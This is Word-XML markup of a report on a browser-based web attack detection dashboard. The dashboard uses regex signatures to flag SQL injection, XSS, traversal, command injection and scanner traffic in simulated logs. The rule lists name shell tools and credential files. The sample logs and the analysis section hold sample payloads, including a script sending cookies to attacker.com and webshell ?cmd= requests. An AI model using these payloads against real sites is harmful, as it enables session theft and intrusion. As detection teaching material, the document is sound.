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t>Web Attack Detection Dashboard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/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t>Detecting suspicious patterns from simulated web-server logs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Standalone Web Detection Dashboard code -</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal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</w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal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drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="5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666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drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="6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9941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drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="6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5731510" cy="28994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Code -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&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;html lang="en"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;head&gt;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&lt;meta charset="UTF-8"&gt;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&lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;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&lt;title&gt;Advanced Web Attack Detection Dashboard&lt;/title&gt;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&lt;!-- Tailwind CSS CDN --&gt;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&lt;script src="https://cdn.tailwindcss.com"&gt;&lt;/script&gt;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&lt;!-- Chart.js CDN --&gt;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&lt;script src="https://cdn.jsdelivr.net/npm/chart.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;!-- Leaflet CSS --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;link rel="stylesheet" href="https://unpkg.com/leaflet@1.9.4/dist/leaflet.css" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;!-- Leaflet JS --&gt;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&lt;script src="https://unpkg.com/leaflet@1.9.4/dist/leaflet.js"&gt;&lt;/script&gt; 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&lt;style&gt;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body { background-color: #0f172a; color: #f8fafc; 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.drawer-open { transform: translateX(0); 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.drawer-closed { transform: translateX(100%); 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&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;body class="p-6 font-sans relative overflow-x-hidden"&gt;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&lt;!-- Header &amp; Dynamic Controls --&gt;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&lt;div class="flex flex-col md:flex-row justify-between items-start md:items-center mb-6 border-b border-slate-700 pb-4 gap-4"&gt;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&lt;h1 class="text-2xl font-bold text-red-500 flex items-center gap-2"&gt;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&lt;span&gt;&lt;/span&gt; SIEM Web Attack Detection &amp; Inspector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&lt;/h1&gt;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class="text-sm text-slate-400"&gt;Real-time log stream ingestion, automated payload decoding, and behavioral threat heuristics&lt;/p&gt;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class="flex flex-wrap items-center gap-3"&gt;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&lt;input type="file" id="logFileInput" accept=".log,.txt,.csv" class="hidden" onchange="handleFileUpload(event)"&gt;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&lt;label for="logFileInput" class="cursor-pointer bg-slate-700 hover:bg-slate-600 text-slate-200 font-semibold py-2 px-4 rounded border border-slate-600 shadow transition text-sm flex items-center gap-2"&gt;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&lt;span&gt;&lt;/span&gt; Open Log File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&lt;/label&gt;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&lt;button onclick="injectSimulatedLogs()" class="bg-red-600 hover:bg-red-700 text-white font-semibold py-2 px-4 rounded shadow transition text-sm flex items-center gap-2"&gt;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&lt;span&gt;&lt;/span&gt; Ingest Attack Stream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&lt;/button&gt;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&lt;button onclick="exportThreatsCSV()" class="bg-emerald-600 hover:bg-emerald-700 text-white font-semibold py-2 px-4 rounded shadow transition text-sm flex items-center gap-2"&gt;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&lt;span&gt;&lt;/span&gt; Export CSV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&lt;/button&gt;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&lt;!-- Metric KPI Cards →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&lt;div class="grid grid-cols-1 md:grid-cols-5 gap-4 mb-6"&gt;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class="bg-slate-800 border border-slate-700 p-4 rounded-lg"&gt;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class="text-xs text-slate-400 font-medium"&gt;TOTAL LOGS ANALYZED&lt;/p&gt;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id="stat-total" class="text-3xl font-bold text-white mt-1"&gt;0&lt;/p&gt;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class="bg-slate-800 border border-red-900/50 p-4 rounded-lg"&gt;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class="text-xs text-red-400 font-medium"&gt;DETECTED ATTACKS&lt;/p&gt;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id="stat-attacks" class="text-3xl font-bold text-red-500 mt-1"&gt;0&lt;/p&gt;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class="bg-slate-800 border border-amber-900/50 p-4 rounded-lg"&gt;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class="text-xs text-amber-400 font-medium"&gt;RATE LIMIT / BRUTE FORCE&lt;/p&gt;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id="stat-ratelimit" class="text-3xl font-bold text-amber-400 mt-1"&gt;0&lt;/p&gt;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class="bg-slate-800 border border-slate-700 p-4 rounded-lg"&gt;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class="text-xs text-slate-400 font-medium"&gt;BENIGN TRAFFIC&lt;/p&gt;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id="stat-benign" class="text-3xl font-bold text-emerald-400 mt-1"&gt;0&lt;/p&gt;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class="bg-slate-800 border border-slate-700 p-4 rounded-lg"&gt;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class="text-xs text-slate-400 font-medium"&gt;UNIQUE ATTACKER IPs&lt;/p&gt;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&lt;p id="stat-ips" class="text-3xl font-bold text-sky-400 mt-1"&gt;0&lt;/p&gt;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&lt;!-- Visual Analytics Charts --&gt;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&lt;div class="grid grid-cols-1 lg:grid-cols-3 gap-6 mb-6"&gt;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class="bg-slate-800 border border-slate-700 p-4 rounded-lg"&gt;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&lt;h2 class="text-sm font-semibold text-slate-300 mb-4"&gt;Attack Vector Breakdown&lt;/h2&gt;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&lt;div class="relative h-64"&gt;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&lt;canvas id="threatChart"&gt;&lt;/canvas&gt;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class="bg-slate-800 border border-slate-700 p-4 rounded-lg lg:col-span-2"&gt;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&lt;h2 class="text-sm font-semibold text-slate-300 mb-4"&gt;Top Attacking IP Addresses &amp; Activity Volume&lt;/h2&gt;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&lt;div class="relative h-64"&gt;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&lt;canvas id="ipChart"&gt;&lt;/canvas&gt;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&lt;!-- Real-Time Threat Feed Table --&gt;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&lt;div class="bg-slate-800 border border-slate-700 p-4 rounded-lg"&gt;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class="flex justify-between items-center mb-4"&gt;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&lt;h2 class="text-sm font-semibold text-slate-300"&gt;Real-Time Threat Detection Feed&lt;/h2&gt;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&lt;span class="text-xs text-slate-400"&gt;Click any row to inspect deep log details&lt;/span&gt;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class="overflow-x-auto"&gt;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&lt;table class="w-full text-left text-xs text-slate-300"&gt;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&lt;thead class="bg-slate-900/80 text-slate-400 border-b border-slate-700 uppercase"&gt;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&lt;tr&gt;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&lt;th class="p-2"&gt;Timestamp&lt;/th&gt;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&lt;th class="p-2"&gt;Source IP&lt;/th&gt;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&lt;th class="p-2"&gt;Category&lt;/th&gt;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&lt;th class="p-2"&gt;Status&lt;/th&gt;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&lt;th class="p-2"&gt;Request URI Payload&lt;/th&gt;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&lt;th class="p-2"&gt;Action&lt;/th&gt;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&lt;/tr&gt;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&lt;/thead&gt;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&lt;tbody id="log-table-body" class="divide-y divide-slate-700 font-mono"&gt;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&lt;tr id="empty-row"&gt;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&lt;td colspan="6" class="p-4 text-center text-slate-500 font-sans"&gt;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  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No threat alerts generated yet. Click " Ingest Attack Stream" or upload a log file to begin.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&lt;/td&gt;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&lt;/tr&gt;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&lt;/tbody&gt;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&lt;/table&gt;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&lt;!-- Deep Log Details Slide-Over Inspector Drawer --&gt;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&lt;div id="inspectorDrawer" class="fixed top-0 right-0 h-full w-full max-w-xl bg-slate-900 border-l border-slate-700 shadow-2xl p-6 transition-transform duration-300 z-50 drawer-closed overflow-y-auto"&gt;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class="flex justify-between items-center border-b border-slate-700 pb-4 mb-4"&gt;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&lt;h3 class="text-lg font-bold text-red-400 flex items-center gap-2"&gt;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&lt;span&gt;&lt;/span&gt; Threat Analysis &amp; Forensic Payload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&lt;/h3&gt;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&lt;button onclick="closeDrawer()" class="text-slate-400 hover:text-white font-bold text-xl"&gt;&amp;times;&lt;/button&gt;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class="space-y-4 text-xs"&gt;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&lt;p class="text-slate-500 uppercase font-semibold"&gt;Detection Category&lt;/p&gt;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&lt;p id="drawer-category" class="text-sm font-bold text-red-400 mt-0.5"&gt;-&lt;/p&gt;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&lt;div class="grid grid-cols-2 gap-4"&gt;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&lt;p class="text-slate-500 uppercase font-semibold"&gt;Source IP Address&lt;/p&gt;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&lt;p id="drawer-ip" class="text-amber-400 font-mono text-sm mt-0.5"&gt;-&lt;/p&gt;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&lt;p class="text-slate-500 uppercase font-semibold"&gt;HTTP Status Response&lt;/p&gt;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&lt;p id="drawer-status" class="font-mono text-sm mt-0.5"&gt;-&lt;/p&gt;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&lt;p class="text-slate-500 uppercase font-semibold"&gt;Timestamp&lt;/p&gt;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&lt;p id="drawer-timestamp" class="text-slate-300 font-mono mt-0.5"&gt;-&lt;/p&gt;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&lt;p class="text-slate-500 uppercase font-semibold"&gt;Raw Request URI&lt;/p&gt;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&lt;div id="drawer-raw-uri" class="bg-slate-950 p-2.5 rounded border border-slate-800 text-slate-300 font-mono break-all mt-1"&gt;-&lt;/div&gt;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&lt;p class="text-slate-500 uppercase font-semibold"&gt;Decoded / Normalised Payload&lt;/p&gt;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&lt;div id="drawer-decoded-uri" class="bg-slate-950 p-2.5 rounded border border-red-950/60 text-red-300 font-mono break-all mt-1"&gt;-&lt;/div&gt;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&lt;p class="text-slate-500 uppercase font-semibold"&gt;User-Agent Header&lt;/p&gt;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&lt;div id="drawer-agent" class="bg-slate-950 p-2.5 rounded border border-slate-800 text-slate-400 font-mono break-all mt-1"&gt;-&lt;/div&gt;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&lt;p class="text-slate-500 uppercase font-semibold"&gt;Full Raw Log Entry&lt;/p&gt;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&lt;pre id="drawer-full-log" class="bg-slate-950 p-2.5 rounded border border-slate-800 text-slate-400 font-mono whitespace-pre-wrap break-all mt-1"&gt;-&lt;/pre&gt;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&lt;div class="bg-slate-800 border border-slate-700 p-4 rounded-lg mb-6"&gt;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&lt;div class="flex justify-between items-center mb-3"&gt;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&lt;h2 class="text-sm font-semibold text-slate-300 flex items-center gap-2"&gt;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&lt;span&gt;&lt;/span&gt; Attacker Geographic Locations (GeoIP Map)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&lt;/h2&gt;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&lt;span id="geo-status" class="text-xs text-slate-400"&gt;Map initialized&lt;/span&gt;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&lt;!-- Map container div --&gt;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&lt;div id="attackerMap" class="h-80 w-full rounded border border-slate-700 z-10"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pP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&lt;!-- JavaScript SIEM Analytics Engine --&gt;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&lt;script&gt;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const metrics = { total: 0, attacks: 0, rateLimit: 0, benign: 0, categories: {}, ips: {} };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const threatRecords = [];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const ipRequestTracker = {}; // Tracks IP timestamp history for rate-limiting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const THREAT_RULES =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'SQL Injection (SQLi)': /(union\s+select|select\s+.*?\s+from|insert\s+into|or\s+1=1|--|\/\*|\*\/|waitfor\s+delay|sleep\(|\b(drop|exec|declare)\b)/i,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'Cross-Site Scripting (XSS)': /(&lt;script|javascript:|on\w+\s*=|&lt;iframe|&lt;img\s+src=.*?onerror|document\.cookie|alert\(|eval\()/i,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'Path / Directory Traversal': /(\.\.\/|\.\.\\|%2e%2e%2f|%2e%2e\/|etc\/passwd|boot\.ini|win\.ini)/i,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'Command Injection / RCE': /(;|\||&amp;|`)\s*(cat|ls|id|whoami|nc|bash|powershell|curl|wget)\b|(\?cmd=|\/bin\/sh)/i,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'Scanner / Bot Activity': /(sqlmap|nikto|nmap|hydra|gobuster|dirbuster|wpscan|masscan|zgrab)/i,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'Sensitive File Exposure': /(\.env|\.git\/|\.htaccess|wp-config\.php|config\.json|backup\.sql)/i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let threatChart, ipChart;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initCharts()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ctxDoughnut = document.getElementById('threatChart').getContext('2d');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threatChart = new Chart(ctxDoughnut,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type: 'doughnut',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data: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labels: [],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datasets: [{ data: [], backgroundColor: ['#ef4444', '#f59e0b', '#10b981', '#3b82f6', '#8b5cf6', '#ec4899'] }]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options: { responsive: true, maintainAspectRatio: false, plugins: { legend: { position: 'bottom', labels: { color: '#94a3b8' } } } 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});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ctxBar = document.getElementById('ipChart').getContext('2d');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ipChart = new Chart(ctxBar,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type: 'bar',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data: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labels: [],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datasets: [{ label: 'Attacks Triggered', data: [], backgroundColor: '#ef4444' }]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options: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responsive: true,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maintainAspectRatio: false,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scales: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x: { ticks: { color: '#94a3b8' }, grid: { display: false } },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y: { ticks: { color: '#94a3b8' }, grid: { color: '#334155' } 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},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plugins: { legend: { display: false } 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});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escapeHTML(str)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if (!str) return '';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return str.replace(/&amp;/g, "&amp;amp;").replace(/&lt;/g, "&amp;lt;").replace(/&gt;/g, "&amp;gt;").replace(/"/g, "&amp;quot;").replace(/'/g, "&amp;#039;");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decodeURL(str)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try { return decodeURIComponent(str); } catch(e) { return str; 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checkRateLimit(ip)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now = Date.now();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if (!ipRequestTracker[ip]) ipRequestTracker[ip] = [];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ipRequestTracker[ip].push(now);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// Filter out requests older than 10 seconds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ipRequestTracker[ip] = ipRequestTracker[ip].filter(t =&gt; now - t &lt;= 10000);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// If &gt; 4 requests in 10s, flag as Rate Limit / Brute Force Burst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return ipRequestTracker[ip].length &gt; 4;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parseLogLine(line)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metrics.total++;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logRegex = /^(\S+) \S+ \S+ \[(.*?)\] "(\S+) (\S+) \S+" (\d{3}) \d+ ".*?" "(.*?)"$/;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match = line.match(logRegex);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if (!match) return;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[, ip, timestamp, method, url, status, userAgent] = match;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decodedURL = decodeURL(url);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let detectedCategory = null;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1. Signature Regex Scan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for (const [category, regex] of Object.entries(THREAT_RULES))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if (regex.test(decodedURL) || regex.test(userAgent))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detectedCategory = category;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break;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2. Behavioral Heuristic: Rate Limiting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isRateLimited = checkRateLimit(ip);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if (!detectedCategory &amp;&amp; isRateLimited)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detectedCategory = 'Rate Limit / Burst Abuse';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metrics.rateLimit++;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if (detectedCategory)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metrics.attacks++;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metrics.categories[detectedCategory] = (metrics.categories[detectedCategory] || 0) + 1;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metrics.ips[ip] = (metrics.ips[ip] || 0) + 1;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const record = { id: threatRecords.length, timestamp, ip, category: detectedCategory, url, decodedURL, status, userAgent, rawLine: line };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threatRecords.push(record);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addTableRow(record);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} else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metrics.benign++;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if (detectedCategory)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metrics.attacks++;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metrics.categories[detectedCategory] = (metrics.categories[detectedCategory] || 0) + 1;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metrics.ips[ip] = (metrics.ips[ip] || 0) + 1;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record = { id: threatRecords.length, timestamp, ip, category: detectedCategory, url, decodedURL, status, userAgent, rawLine: line };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threatRecords.push(record);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addTableRow(record);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// Trigger GeoIP Plot on Leaflet Map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plotThreatOnMap(ip, detectedCategory);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal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updateDashboardUI();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addTableRow(record)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emptyRow = document.getElementById('empty-row');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if (emptyRow) emptyRow.remove();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tbody = document.getElementById('log-table-body');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row = document.createElement('tr');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row.className = "hover:bg-slate-700/50 transition cursor-pointer";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row.onclick = () =&gt; openInspector(record.id);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safeUrl = escapeHTML(record.url);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statusColor = record.status.startsWith('2') ? 'text-emerald-400 bg-emerald-500/10 border-emerald-500/20' :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              </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>record.status.startsWith('4') ? 'text-amber-400 bg-amber-500/10 border-amber-500/20' :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              </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'text-red-400 bg-red-500/10 border-red-500/20';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row.innerHTML = `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&lt;td class="p-2 text-slate-400"&gt;${record.timestamp}&lt;/td&gt;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&lt;td class="p-2 text-amber-400 font-semibold"&gt;${record.ip}&lt;/td&gt;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&lt;td class="p-2"&gt;&lt;span class="bg-red-500/10 text-red-400 border border-red-500/20 px-2 py-0.5 rounded text-[10px]"&gt;${record.category}&lt;/span&gt;&lt;/td&gt;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&lt;td class="p-2"&gt;&lt;span class="border px-1.5 py-0.5 rounded text-[10px] font-bold ${statusColor}"&gt;${record.status}&lt;/span&gt;&lt;/td&gt;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&lt;td class="p-2 text-slate-200 max-w-xs truncate" title="${safeUrl}"&gt;${safeUrl}&lt;/td&gt;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&lt;td class="p-2"&gt;&lt;button class="bg-slate-700 hover:bg-slate-600 text-slate-200 text-[10px] px-2 py-0.5 rounded"&gt;Inspect&lt;/button&gt;&lt;/td&gt;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`;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tbody.prepend(row);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openInspector(recordId)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record = threatRecords[recordId];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if (!record) return;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document.getElementById('drawer-category').innerText = record.category;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document.getElementById('drawer-ip').innerText = record.ip;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document.getElementById('drawer-status').innerText = record.status;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document.getElementById('drawer-timestamp').innerText = record.timestamp;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document.getElementById('drawer-raw-uri').innerText = record.url;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document.getElementById('drawer-decoded-uri').innerText = record.decodedURL;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document.getElementById('drawer-agent').innerText = record.userAgent;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document.getElementById('drawer-full-log').innerText = record.rawLine;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drawer = document.getElementById('inspectorDrawer');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drawer.classList.remove('drawer-closed');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drawer.classList.add('drawer-open');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closeDrawer()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drawer = document.getElementById('inspectorDrawer');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drawer.classList.remove('drawer-open');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drawer.classList.add('drawer-closed');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updateDashboardUI()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document.getElementById('stat-total').innerText = metrics.total;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document.getElementById('stat-attacks').innerText = metrics.attacks;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document.getElementById('stat-ratelimit').innerText = metrics.rateLimit;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document.getElementById('stat-benign').innerText = metrics.benign;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document.getElementById('stat-ips').innerText = Object.keys(metrics.ips).length;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threatChart.data.labels = Object.keys(metrics.categories);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threatChart.data.datasets[0].data = Object.values(metrics.categories);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threatChart.update();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sortedIPs = Object.entries(metrics.ips).sort((a, b) =&gt; b[1] - a[1]).slice(0, 5);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ipChart.data.labels = sortedIPs.map(item =&gt; item[0]);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ipChart.data.datasets[0].data = sortedIPs.map(item =&gt; item[1]);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ipChart.update();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handleFileUpload(event)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file = event.target.files[0];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if (!file) return;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reader = new FileReader();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reader.onload = function(e)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const lines = e.target.result.split(/\r?\n/);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lines.forEach(line =&gt;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if (line.trim()) parseLogLine(line);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};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reader.readAsText(file);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injectSimulatedLogs()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sampleLogs = [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'192.168.1.10 - - [22/Aug/2026:14:32:10 +0000] "GET /index.html HTTP/1.1" 200 4321 "https://google.com" "Mozilla/5.0"',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'10.0.0.45 - - [22/Aug/2026:14:32:12 +0000] "GET /products/item.php?id=1%27%20UNION%20SELECT%201,username,password%20FROM%20users-- HTTP/1.1" 200 8920 "-" "sqlmap/1.6.0"',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'10.0.0.88 - - [22/Aug/2026:14:32:15 +0000] "GET /../../../../etc/passwd HTTP/1.1" 403 280 "-" "Mozilla/5.0"',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'172.16.0.5 - - [22/Aug/2026:14:32:18 +0000] "POST /login.php HTTP/1.1" 401 512 "-" "Hydra/9.2"',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'172.16.0.5 - - [22/Aug/2026:14:32:19 +0000] "POST /login.php HTTP/1.1" 401 512 "-" "Hydra/9.2"',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'172.16.0.5 - - [22/Aug/2026:14:32:19 +0000] "POST /login.php HTTP/1.1" 401 512 "-" "Hydra/9.2"',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'172.16.0.5 - - [22/Aug/2026:14:32:20 +0000] "POST /login.php HTTP/1.1" 401 512 "-" "Hydra/9.2"',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'172.16.0.5 - - [22/Aug/2026:14:32:20 +0000] "POST /login.php HTTP/1.1" 401 512 "-" "Hydra/9.2"',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'192.168.1.99 - - [22/Aug/2026:14:32:25 +0000] "GET /comment.php?msg=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fattacker.com%2Fsteal%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 1250 "-" "Mozilla/5.0"',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'10.0.0.101 - - [22/Aug/2026:14:32:35 +0000] "GET /uploads/avatar.php.png?cmd=cat%20/etc/passwd HTTP/1.1" 200 104 "-" "Mozilla/5.0"',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'10.0.0.105 - - [22/Aug/2026:14:32:40 +0000] "GET /.env HTTP/1.1" 404 210 "-" "Mozilla/5.0"'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];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sampleLogs.forEach((log, index) =&gt;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setTimeout(() =&gt; parseLogLine(log), index * 150);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});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function exportThreatsCSV()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if (threatRecords.length === 0)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alert("No threat records to export.");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return;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let csv = "Timestamp,Source IP,Category,Status,URI,User Agent\n";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threatRecords.forEach(r =&gt;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csv += `"${r.timestamp}","${r.ip}","${r.category}","${r.status}","${r.url.replace(/"/g, '""')}","${r.userAgent.replace(/"/g, '""')}"\n`;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});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blob = new Blob([csv], { type: 'text/csv' });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url = window.URL.createObjectURL(blob);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a = document.createElement('a');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a.setAttribute('href', url);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a.setAttribute('download', `threat_report_${Date.now()}.csv`);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a.click();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document.addEventListener("DOMContentLoaded", function()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if (typeof Chart !== 'undefined') initCharts();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>initMap(); // Initialize Leaflet map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});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if (detectedCategory)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metrics.attacks++;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metrics.categories[detectedCategory] = (metrics.categories[detectedCategory] || 0) + 1;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metrics.ips[ip] = (metrics.ips[ip] || 0) + 1;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record = { id: threatRecords.length, timestamp, ip, category: detectedCategory, url, decodedURL, status, userAgent, rawLine: line };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threatRecords.push(record);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addTableRow(record);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Trigger GeoIP Plot on Leaflet Map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plotThreatOnMap(ip, detectedCategory);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal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Global Map Variables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let map;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>const ipGeoCache = {}; // Cache to prevent duplicate GeoIP API calls for the same IP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>const mapMarkers = [];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Initialize Leaflet Map with Dark Tile Theme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function initMap()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// Centered globally [Lat, Lon], Zoom level 2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map = L.map('attackerMap').setView([20, 0], 2);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Free Dark-themed map tiles from CartoDB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L.tileLayer('https://{s}.basemaps.cartocdn.com/dark_all/{z}/{x}/{y}{r}.png',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attribution: '&amp;copy; &lt;a href="https://www.openstreetmap.org/copyright"&gt;OpenStreetMap&lt;/a&gt; &amp;copy; &lt;a href="https://carto.com/"&gt;CARTO&lt;/a&gt;',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subdomains: 'abcd',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maxZoom: 19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}).addTo(map);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal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Fetch GeoIP coordinates from ip-api.com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async function fetchGeoIP(ip) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>// Return cached coordinates if already fetched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if (ipGeoCache[ip]) return ipGeoCache[ip];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Skip local / private RFC1918 IP addresses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if (ip.startsWith('10.') || ip.startsWith('192.168.') || ip.startsWith('172.16.') || ip === '127.0.0.1') {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Generate a pseudo-random global location for local test IPs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const mockLocations = [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{ lat: 37.7749, lon: -122.4194, city: "San Francisco", country: "United States" },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{ lat: 51.5074, lon: -0.1278, city: "London", country: "United Kingdom" },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{ lat: 35.6762, lon: 139.6503, city: "Tokyo", country: "Japan" },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{ lat: 48.8566, lon: 2.3522, city: "Paris", country: "France" },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{ lat: -33.8688, lon: 151.2093, city: "Sydney", country: "Australia" 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];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const mock = mockLocations[Math.floor(Math.random() * mockLocations.length)];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ipGeoCache[ip] = mock;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mock;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try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const response = await fetch(`http://ip-api.com/json/${ip}?fields=status,country,city,lat,lon`);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const data = await response.json();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 (data.status === 'success')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const geoData = { lat: data.lat, lon: data.lon, city: data.city, country: data.country };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ipGeoCache[ip] = geoData;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return geoData;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} catch (error)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console.warn(`GeoIP lookup failed for IP ${ip}:`, error);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return null;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal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Add map marker for detected threat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async function plotThreatOnMap(ip, category)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geo = await fetchGeoIP(ip);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if (!geo || !map) return;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// Custom Red Pulsing Circle Marker for Attacks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const marker = L.circleMarker([geo.lat, geo.lon], {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color: '#ef4444',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fillColor: '#f87171',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fillOpacity: 0.7,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radius: 8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}).addTo(map);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// Popup detailing IP, City, Country, and Threat Category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marker.bindPopup(`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&lt;div style="color: #0f172a; font-family: sans-serif; font-size: 12px;"&gt;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&lt;strong style="color: #dc2626;"&gt; ${category}&lt;/strong&gt;&lt;br/&gt;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&lt;b&gt;IP:&lt;/b&gt; ${ip}&lt;br/&gt;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&lt;b&gt;Location:&lt;/b&gt; ${geo.city}, ${geo.country}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&lt;/div&gt;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`);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mapMarkers.push(marker);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;/html&gt;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Detecting suspicious patterns and Analysis from simulated web-server logs -</w:t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Note – Data of Logs in the screenshot of the web detection dashboard</w:t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Analysis of the captured logs indicates active exploitation across multiple attack vectors. Several critical attacks returned HTTP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200 OK status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, confirming that vulnerability mitigations are missing and payload execution was successful on the web server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyTex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</w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyTex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Threat Breakdown</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyTex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Successful Remote Code Execution (Web Shell)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Source IPs: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10.0.0.101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,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10.0.0.45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Vectors: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/uploads/avatar.php.png?cmd=id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&amp;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?cmd=whoami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Status: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200 OK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Impact: High critical risk. The server is executing arbitrary system commands passed via an uploaded webshell disguised as an image file (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.php.png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).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Automated Database Extraction (SQLi)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Source IPs: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10.0.0.45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,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172.16.0.5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Tool/User-Agent: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sqlmap/1.6.0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Vectors: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/admin.php?user=UNION SELECT 1,2,3--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&amp;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/products/item.php?id=1' OR 1=1--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Status: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200 OK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Impact: Successful authentication bypass and database enumeration using automated SQL injection tool.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Credential Brute-Forcing &amp; Authentication Compromise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Source IPs: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172.16.0.5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,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192.168.1.99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Tool/User-Agent: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Hydra/9.2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Vectors: POST requests to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/login.php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Status: Shifted from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401 Unauthorized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/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403 Forbidden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to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200 OK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(IP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192.168.1.99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).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Impact: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Hydra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successfully cracked an account credential on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/login.php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Stored / Reflected Stolen Session Tokens (XSS)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Source IPs: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192.168.1.99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,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10.0.0.101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Vectors: Payload attempting cookie exfiltration (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&lt;script&gt;document.location='[http://attacker.com/steal?c='+document.cookie](http://attacker.com/steal?c='+document.cookie)&lt;/script&gt;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).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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28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Status: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200 OK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Impact: Malicious JavaScript injected into parameter inputs without sanitization.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b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans;sans-serif" w:hAnsi="Google Sans;sans-serif"/>
          <w:b/>
          <w:bCs/>
        </w:rPr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b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans;sans-serif" w:hAnsi="Google Sans;sans-serif"/>
          <w:b/>
          <w:bCs/>
        </w:rPr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b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
